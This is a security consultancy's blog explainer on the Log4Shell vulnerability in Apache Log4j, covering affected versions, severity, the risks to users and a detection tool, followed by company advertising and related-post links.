Log4Shell (CVE-2021-44228) was a zero-day vulnerability in Log4j, a popular Java logging framework, involving arbitrary code execution. The vulnerability has existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud’s security team on 24 November 2021, and was publicly disclosed on 9 December 2021
What is Log4J?
Log4j is a Java-based logging utility that is part of the Apache Logging Services. Log4j is one of the several Java logging frameworks which is popularly used by millions of Java applications on the internet.
Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. The exploit is simple to execute and is estimated to affect hundreds of millions of devices.
Image Source: GovCERT.ch
This allows attackers to:
- Access the entire network through the affected device or application
- Run any code
- Access all data on the affected device or application
- Delete or encrypt files
What Devices and Applications are Vulnerable to Log4Shell
If a device that is connected to the internet runs Apache Log4j, versions 2.0-to-2.14.1, then they are vulnerable to Log4Shell.
Vulnerability Type Remote Code Execution
Severity Critical
Base CVSS Score 10.0
Versions Affected All versions from 2.0-beta9 to 2.14.1
Log4j Vulnerability Detection:
There are certain tools to scan the packages for the presence of Log4j vulnerability. They are as follows.
How to download and install Log4j Detect in 2022?
Log4j Detect is a free CLI tool that quickly scans your projects to find vulnerable Log4j versions containing the following known CVEs:
- CVE-2021-45046
- CVE-2021-44228
- CVE-2021-4104
- CVE-2021-45105
- CVE-2021-44832
It provides the exact path to direct and indirect dependencies, along with the fixed version for speedy remediation.
Article Source:- https://www.detoxtechnologies.com/what-is-log4shell
Detox Technologies is an ISO 27001-2013 certified Global Consultation and Implementation company, Headquartered in derbyshire UK & R&D Center in Delhi. We believe in precision and quality above everything else.
We are the trusted standard for companies and individuals acquiring services to protect their brands, businesses and dignity from baffling Cyber-attacks. We provide end to end cyber security solutions to our clients.
Our thrust on securing the People-Process-Technology has enabled us to offer impenetrable security to our clients across the world. Our success stories are translated in the form of positive testimonials from our growing list of clients.
For More Info About—- Cyber Security Consulting
Call Now—+91 9711761704, +91 9289014236
Address:—Detox Technologies, Pinnacle Tower, G-06, Ground Floor, Block A, Industrial Area, Sector-62, Noida 201309
Best Cyber Security Companies | Best Cyber Security Companies | Cyber Security Software Companies | Cyber Security Professional Services | Cyber Security Solution Companies | Cyber Security Consulting Firms | Cyber Security Services Companies | Top Cyber Security Companies | Top Cyber Security Firms|
- How Israel-Iran Cyber War Has Changed The Face Of Modern Warfare
- Understanding Task Hijacking in Android
- Top 10 Attacks And Vulnerabilities Of OWASP Mobile in 2022
- A Comprehensive Guide to OWASP Security Testing in 2022
- What is Web Application Penetration Testing Methodology
- 10 Types Of Cyber Attacks And How They Can Affect You in 2022
- What is Android app Pentesting in 2022- Detox Technologies
- How To Perform Security Testing Of Mobile Apps In 2022
- Top Reasons for using AI in Cyber Security
- How To Protect Yourself From Online Scammers In 2022
- 10 Warning Signs Of An Imminent Cyber Attack In 2022
- What Is Log4Shell? The Log4j Vulnerability Explained in 2022
- What Is Android App Pentesting Testing Methodology In 2022
0 Comments